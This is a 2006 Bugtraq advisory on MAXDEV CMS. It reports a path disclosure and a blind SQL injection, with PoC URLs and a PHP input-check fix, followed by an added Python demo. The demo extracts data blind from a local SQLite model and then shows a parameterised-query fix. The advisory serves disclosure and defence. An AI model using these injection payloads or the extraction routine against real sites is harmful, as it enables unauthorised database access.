Message-ID: <20060406180246.16721.qmail@securityfocus.com>
Date: 6 Apr 2006 18:02:46 -0000
From: king_purba@...oo.co.uk
To: bugtraq@...urityfocus.com
Subject: MAXDEV CMS Multiple vulnerabilities
Full path disclosure
--------------------
This hole is caused by direct access to the file includes/legacy.php, which is not protected.
PoC :
http://site.co.id/maxdev/includes/legacy.php
Fix :
Turning off display_errors in php.ini can fix this security issue.
Blind SQL injection
-------------------
This hole is caused by the filter script not being applied to the $topicid variable in the file modules/Topics/pnuserapi.php.
PoC :
http://site.co.id/maxdev/index.php?module=Topics&func=display&topicid=0 AND 1=0
http://site.co.id/maxdev/index.php?module=Topics&func=display&topicid=0 AND 1=1
Fix :
MAXDEV CMS has a filter script to protect all requests, but I'm too lazy to analyze the code, so I just added this code
in modules/Topics/pnuserapi.php:
// Added to modules/Topics/pnuserapi.php: stop a non-numeric topicid before it reaches the query.
// validate() is defined below its first use; PHP hoists top-level function definitions, so this works.
if (isset($_GET['topicid'])) {
    $topicid = $_GET['topicid'];
    validate($topicid);
}

function validate($char)
{
    // is_numeric() rejects payloads such as "0 AND 1=1" (they contain spaces and letters)
    if (!is_numeric($char)) {
        die("i have received an error request");
    }
}
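The boolean oracle behind the two PoC URLs above, and the hardened form of the query, as an added example (not code from the advisory or from MAXDEV CMS): it models the vulnerable parameter splice against an in-memory SQLite table of constructed topic rows, uses the true/false difference in the response to read a value blind, then shows a strict integer check in front of a parameterised query. The table name, column names and topic rows are assumptions; topicid=1 is used instead of the PoC's 0 so that the true branch actually returns a row.

```python
import re
import sqlite3

# Constructed sample rows; the table layout is an assumption, not MAXDEV's schema.
TOPICS = [(1, "general"), (2, "security"), (3, "offtopic")]


def make_db():
    """Build an in-memory SQLite database holding the constructed topics."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE topics (topicid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO topics VALUES (?, ?)", TOPICS)
    return conn


def display_vulnerable(conn, topicid):
    """Models func=display with the raw topicid spliced into the SQL string.

    This is the defect the advisory describes: no filter runs on topicid,
    so '1 AND 1=0' rewrites the WHERE clause instead of being a literal.
    """
    sql = "SELECT name FROM topics WHERE topicid = " + str(topicid)
    return [row[0] for row in conn.execute(sql)]


def blind_extract(oracle, max_len=16):
    """Recover topic 2's name using nothing but the page's true/false difference.

    Each probe asks "is character N of the secret equal to c?"; a row coming
    back means yes. This is why a boolean difference alone is a real leak.
    """
    charset = "abcdefghijklmnopqrstuvwxyz"
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            probe = ("1 AND (SELECT substr(name,%d,1) FROM topics "
                     "WHERE topicid=2)='%s'" % (pos, c))
            if oracle(probe):
                recovered += c
                break
        else:
            break  # no character matched: end of the value
    return recovered


def is_int_id(value):
    """Strict check: digits only. PHP's is_numeric() also accepts 1.5 and 1e3."""
    return re.fullmatch(r"[0-9]+", str(value)) is not None


def display_hardened(conn, topicid):
    """Validate, then bind topicid as a parameter so it can never alter the SQL."""
    if not is_int_id(topicid):
        raise ValueError("i have received an error request")
    rows = conn.execute("SELECT name FROM topics WHERE topicid = ?", (int(topicid),))
    return [row[0] for row in rows]


def demo():
    """Run the oracle, the blind read and the hardened path; returns the results."""
    conn = make_db()
    oracle = lambda probe: bool(display_vulnerable(conn, probe))
    try:
        display_hardened(conn, "1 AND 1=1")
        rejected = False
    except ValueError:
        rejected = True
    return {
        "true_branch": display_vulnerable(conn, "1 AND 1=1"),
        "false_branch": display_vulnerable(conn, "1 AND 1=0"),
        "leaked": blind_extract(oracle),
        "hardened": display_hardened(conn, "2"),
        "rejected": rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The posted validate() does stop the two PoC payloads, since is_numeric() rejects the spaces and letters in "0 AND 1=1"; the check above is stricter only in that it also rejects decimal and exponent forms. The caveat visible in the posted snippet is that it guards $_GET alone, so if the module reads topicid from any other source the check is not reached; binding the value as a query parameter, as display_hardened does, closes the injection regardless of where the value came from.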